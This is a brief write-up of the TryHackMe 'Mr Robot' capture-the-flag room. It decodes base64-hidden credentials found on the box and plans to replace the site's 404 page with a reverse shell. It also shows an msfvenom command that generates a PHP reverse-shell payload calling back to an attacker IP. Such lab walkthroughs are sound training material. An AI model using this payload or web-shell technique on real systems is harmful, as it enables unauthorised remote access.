LoestBazan87/Writeups/TryHackMe/Mr_Robot.md

 ![image](https://github.com/user-attachments/assets/959d45f4-1b81-484e-975c-ae19f5b99582)<br>
 ![image](https://github.com/user-attachments/assets/c17c5f8b-fb24-4b15-9f33-20ce7e32b5fb)

+## **We found several hidden pages, but in one we found a hash64**
 ```bash
 echo 'ZWxsaW90OkVSMjgtMDY1Mgo=' | base64 -d
 ```
 ![image](https://github.com/user-attachments/assets/e5b4b107-1390-43e1-b5d5-653e80accca0)<br>
 elliot:ER28-0652<br>
 ![image](https://github.com/user-attachments/assets/6af5ebc6-25f7-439c-9cd1-0b48cd970cfe)

+## **We are going to modify a part of the web in this case the error 404 that when entering a site that does not exist, a code that we will create will be executed and it will return a shell that we will intercept later.**
 ![image](https://github.com/user-attachments/assets/4bf0c610-9e79-4be4-8b80-c4b3e426c666)

+## **Creating the malicious code**
 ```bash
 msfvenom -p php/reverse_php LHOST=10.21.118.81 LPORT=443 -f raw > pwned.php
 ```